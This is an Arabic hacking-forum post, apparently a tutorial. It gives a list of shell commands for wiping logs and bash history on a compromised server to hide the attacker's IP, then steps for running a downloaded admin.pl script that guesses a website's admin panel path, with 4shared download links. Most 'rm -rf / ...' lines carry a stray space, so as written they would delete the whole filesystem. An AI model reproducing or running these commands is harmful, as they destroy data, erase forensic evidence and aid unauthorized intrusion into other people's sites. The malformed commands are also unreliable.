اوامر مسح اللوجز
rm -rf / tmp/logs
rm -rf $HISTFILE
rm -rf / root/.ksh_history
rm -rf / root/.bash_history
rm -rf / root/.ksh_history
rm -rf / root/.bash_logout
rm -rf / usr/local/apache/logs
rm -rf / usr/local/apache/log
rm -rf / var/apache/logs
rm -rf / var/apache/log
rm -rf / var/run/utmp
rm -rf / var/logs
rm -rf / var/log
rm -rf / var/adm
rm -rf / etc/wtmp
rm -rf / etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
قم بتطبيقها كافه بالشل
لكن تذكر ان المسح ليس نقي 100%
والسبب انه يتم ترك اخر لوجز بعد المسح بالتالي يمكن معرفه الاي بي الخاص بك
لكن الاحتمال ضئيل جدا
------------------------
انتينا من الخطوه الاولى ناتي الى الخطوه 2
تريد تخمين مسار لوحه التحكم
قم بتحميل برنامج اكتف بريل (برنامج هام جدا جدا لكل هكر ويساعد كثيرا باستغلال الثغرات)
وضع الملف (بالمرفقات) admin.pl
في قرص السي
ثم اذهب لشاشه الدوز
من
ابدا
run
cmd
--
ثم ادخل الامر التالي
cd/
ثم
admin.pl
سيطلب منك ادخال نوع ملفات الموقع
يخيرك بين
php , asp
انت اختار نوع الموقع وفيك تعرف حسيب نوع الملف المصاب
وبعدها رح يخمن لوحده
المرفقات
http://www.4shared.com/file/21153047...e60/admin.html
المزيد من الادوات التي تعمل بنفس الطريقه سيتم الشرح بموضوع منفصل
http://www.4shared.com/file/21153065...8b/column.html
http://www.4shared.com/file/21153043...3c0/table.html
كان عندي اداه رائعه ومميزه لمسح الوجز
اعتقد انها بتمسح بنضافه كامله
لكن للاسف اضعتها